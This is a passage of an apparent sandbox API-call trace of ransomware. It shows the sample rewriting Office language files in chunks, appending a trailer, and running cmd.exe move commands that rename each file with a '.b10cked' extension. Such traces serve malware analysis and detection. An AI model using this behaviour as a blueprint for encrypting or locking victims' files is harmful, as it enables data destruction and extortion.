lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.491] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x4000, lpOverlapped=0x0) returned 1 [0167.493] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff60000 [0167.497] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.497] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.498] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.498] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.498] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.499] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4000, lpOverlapped=0x0) returned 1 [0167.499] VirtualFree (lpAddress=0x7ff60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.501] SetFilePointer (in: hFile=0x114, lDistanceToMove=1310720, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x140000 [0167.501] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.503] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.504] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.506] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.508] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x4000, lpOverlapped=0x0) returned 1 [0167.511] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff60000 [0167.516] SetFilePointer (in: hFile=0x114, lDistanceToMove=1310720, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x140000 [0167.516] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.517] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.517] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.517] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.518] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4000, lpOverlapped=0x0) returned 1 [0167.518] VirtualFree (lpAddress=0x7ff60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.520] SetFilePointer (in: hFile=0x114, lDistanceToMove=-262144, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x272560 [0167.520] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.644] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.645] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.647] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0167.647] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x4000, lpOverlapped=0x0) returned 1 [0167.649] VirtualAlloc (lpAddress=0x0, dwSize=0x50000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff60000 [0167.653] SetFilePointer (in: hFile=0x114, lDistanceToMove=-262144, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x272560 [0167.653] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.653] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.654] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.654] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0167.654] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x4000, lpOverlapped=0x0) returned 1 [0167.654] VirtualFree (lpAddress=0x7ff60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0167.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOINTL.REST.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0167.662] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSOINTL.REST.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOINTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0167.662] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x2b2560 [0167.662] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0167.662] CloseHandle (hObject=0x114) returned 1 [0167.779] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX") returned 0x3c [0167.780] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0167.781] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xc4, dwThreadId=0x130)) returned 1 [0167.788] CloseHandle (hObject=0x1b4) returned 1 [0167.788] CloseHandle (hObject=0x114) returned 1 [0167.788] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.788] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.788] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0167.788] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.788] ReleaseMutex (hMutex=0xf8) returned 1 [0167.788] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.788] ReleaseMutex (hMutex=0xf8) returned 1 [0167.788] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.789] ReleaseMutex (hMutex=0xf8) returned 1 [0167.789] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0167.789] ReleaseMutex (hMutex=0xf8) returned 1 [0167.789] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.789] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22457834713) returned 1 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.789] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xb360 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.790] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.791] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.791] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb360 [0167.791] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0167.791] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xae78 [0167.791] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0167.812] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0167.812] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.813] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xb360 [0167.813] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0167.813] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0167.813] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.813] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xb360 [0167.813] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0167.813] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.813] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x59af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x59af, lpOverlapped=0x0) returned 1 [0167.814] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0167.814] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x59af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x59af, lpOverlapped=0x0) returned 1 [0167.815] SetFilePointer (in: hFile=0x114, lDistanceToMove=-22959, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x59b1 [0167.815] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x59af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x59af, lpOverlapped=0x0) returned 1 [0167.816] SetFilePointer (in: hFile=0x114, lDistanceToMove=-22959, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x59b1 [0167.816] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x59af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x59af, lpOverlapped=0x0) returned 1 [0167.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0167.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OMSINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OMSINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0167.821] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xb360 [0167.821] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0167.822] CloseHandle (hObject=0x114) returned 1 [0167.823] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OMSINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX") returned 0x3c [0167.824] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0167.824] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x748, dwThreadId=0x8cc)) returned 1 [0167.834] CloseHandle (hObject=0x1b4) returned 1 [0167.834] CloseHandle (hObject=0x114) returned 1 [0167.834] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.834] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0167.834] CompareStringW (Locale=0x400, dwCmpFlags=0x0, 